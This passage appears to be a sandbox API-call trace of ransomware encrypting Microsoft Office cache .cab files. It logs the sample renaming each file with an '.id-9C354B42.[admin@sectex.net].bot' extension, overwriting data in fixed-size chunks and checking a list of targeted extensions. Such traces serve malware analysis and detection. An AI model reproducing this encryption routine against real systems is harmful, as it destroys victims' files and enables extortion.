	[0042.938] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0042.939] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.939] ReadFile (in: hFile=0x1f0, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0042.953] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0042.953] WriteFile (in: hFile=0x1f0, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0104, lpOverlapped=0x0) returned 1
	[0043.148] SetEndOfFile (hFile=0x1f0) returned 1
	[0043.148] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0043.157] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.157] WriteFile (in: hFile=0x1f0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.365] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.365] WriteFile (in: hFile=0x1f0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.370] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x28b13b, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0043.370] WriteFile (in: hFile=0x1f0, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0043.372] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0043.376] CloseHandle (hObject=0x1f0) returned 1
	[0044.081] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.092] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.092] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.092] lstrlenW (lpString=".doc") returned 4
	[0044.092] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.092] lstrlenW (lpString=".docx") returned 5
	[0044.092] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.092] lstrlenW (lpString=".pdf") returned 4
	[0044.092] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.092] lstrlenW (lpString=".xls") returned 4
	[0044.092] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.092] lstrlenW (lpString=".xlsx") returned 5
	[0044.092] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.093] lstrlenW (lpString=".ppt") returned 4
	[0044.093] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString=".zip") returned 4
	[0044.093] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString=".rar") returned 4
	[0044.093] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString=".bz2") returned 4
	[0044.093] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.093] lstrlenW (lpString=".7z") returned 3
	[0044.093] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString=".dbf") returned 4
	[0044.093] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString=".1cd") returned 4
	[0044.093] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString=".jpg") returned 4
	[0044.093] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.093] lstrlenW (lpString=".doc") returned 4
	[0044.093] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString=".docx") returned 5
	[0044.093] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.093] lstrlenW (lpString=".pdf") returned 4
	[0044.093] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString=".xls") returned 4
	[0044.093] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.093] lstrlenW (lpString=".xlsx") returned 5
	[0044.093] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.093] lstrlenW (lpString=".ppt") returned 4
	[0044.094] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.094] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.094] lstrlenW (lpString=".zip") returned 4
	[0044.094] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.094] lstrlenW (lpString=".rar") returned 4
	[0044.094] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.094] lstrlenW (lpString=".bz2") returned 4
	[0044.094] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.094] lstrlenW (lpString=".7z") returned 3
	[0044.094] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.094] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.094] lstrlenW (lpString=".dbf") returned 4
	[0044.094] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.094] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.094] lstrlenW (lpString=".1cd") returned 4
	[0044.094] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.094] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab") returned 75
	[0044.094] lstrlenW (lpString=".jpg") returned 4
	[0044.094] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.094] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0044.094] lstrlenW (lpString="OnoteLR.cab") returned 11
	[0044.094] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.094] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=17456632) returned 1
	[0044.095] CloseHandle (hObject=0x1f0) returned 1
	[0044.095] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab")) returned 0x2020
	[0044.095] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.095] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.095] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0044.095] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.095] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.095] ReadFile (in: hFile=0x1f0, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.100] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.100] ReadFile (in: hFile=0x1f0, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.103] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.103] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.103] ReadFile (in: hFile=0x1f0, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.118] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.118] WriteFile (in: hFile=0x1f0, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0044.133] SetEndOfFile (hFile=0x1f0) returned 1
	[0044.133] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0044.133] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.133] WriteFile (in: hFile=0x1f0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.134] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x58c9fd, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.134] WriteFile (in: hFile=0x1f0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.135] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x1065df8, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.135] WriteFile (in: hFile=0x1f0, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.137] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0044.137] CloseHandle (hObject=0x1f0) returned 1
	[0044.137] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.137] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.137] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.137] lstrlenW (lpString=".doc") returned 4
	[0044.137] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString=".docx") returned 5
	[0044.137] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.137] lstrlenW (lpString=".pdf") returned 4
	[0044.137] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString=".xls") returned 4
	[0044.137] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString=".xlsx") returned 5
	[0044.137] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.137] lstrlenW (lpString=".ppt") returned 4
	[0044.137] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.137] lstrlenW (lpString=".zip") returned 4
	[0044.137] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString=".rar") returned 4
	[0044.137] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.137] lstrlenW (lpString=".bz2") returned 4
	[0044.137] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.138] lstrlenW (lpString=".7z") returned 3
	[0044.138] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString=".dbf") returned 4
	[0044.138] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString=".1cd") returned 4
	[0044.138] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString=".jpg") returned 4
	[0044.138] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString=".doc") returned 4
	[0044.138] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString=".docx") returned 5
	[0044.138] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.138] lstrlenW (lpString=".pdf") returned 4
	[0044.138] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString=".xls") returned 4
	[0044.138] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString=".xlsx") returned 5
	[0044.138] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.138] lstrlenW (lpString=".ppt") returned 4
	[0044.138] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.138] lstrlenW (lpString=".zip") returned 4
	[0044.138] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString=".rar") returned 4
	[0044.138] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.138] lstrlenW (lpString=".bz2") returned 4
	[0044.138] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.138] lstrlenW (lpString=".7z") returned 3
	[0044.138] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0044.138] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.139] lstrlenW (lpString=".dbf") returned 4
	[0044.139] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0044.139] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.139] lstrlenW (lpString=".1cd") returned 4
	[0044.139] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0044.139] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 74
	[0044.139] lstrlenW (lpString=".jpg") returned 4
	[0044.389] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0044.389] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0044.389] lstrlenW (lpString="ProjLR.cab") returned 10
	[0044.389] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.670] GetFileSizeEx (in: hFile=0x200, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=8265165) returned 1
	[0044.670] CloseHandle (hObject=0x200) returned 1
	[0044.670] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab")) returned 0x2020
	[0044.670] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0044.670] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0044.670] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200
	[0044.671] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0044.671] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.671] ReadFile (in: hFile=0x200, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.675] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.675] ReadFile (in: hFile=0x200, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.678] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0044.678] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0044.678] ReadFile (in: hFile=0x200, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0044.694] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0044.694] WriteFile (in: hFile=0x200, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0044.937] SetEndOfFile (hFile=0x200) returned 1
	[0044.937] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb50b818
	[0044.941] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.941] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.943] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x2a09ef, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.943] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.945] SetFilePointerEx (in: hFile=0x200, liDistanceToMove=0x7a1dcd, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0044.945] WriteFile (in: hFile=0x200, lpBuffer=0xb50b818*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb50b818*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0044.947] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb50b818 | out: hHeap=0x7d60000) returned 1
	[0044.947] CloseHandle (hObject=0x200) returned 1
	[0044.947] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0044.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.948] lstrlenW (lpString=".doc") returned 4
	[0044.948] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString=".docx") returned 5
	[0044.948] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1
	[0044.948] lstrlenW (lpString=".pdf") returned 4
	[0044.948] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString=".xls") returned 4
	[0044.948] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString=".xlsx") returned 5
	[0044.948] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1
	[0044.948] lstrlenW (lpString=".ppt") returned 4
	[0044.948] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73
	[0044.948] lstrlenW (lpString=".zip") returned 4
	[0044.948] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString=".rar") returned 4
	[0044.948] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0044.948] lstrlenW (lpString=".bz2") returned 4
	[0044.948] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0044.948] lstrlenW (lpString=".7z") returned 3
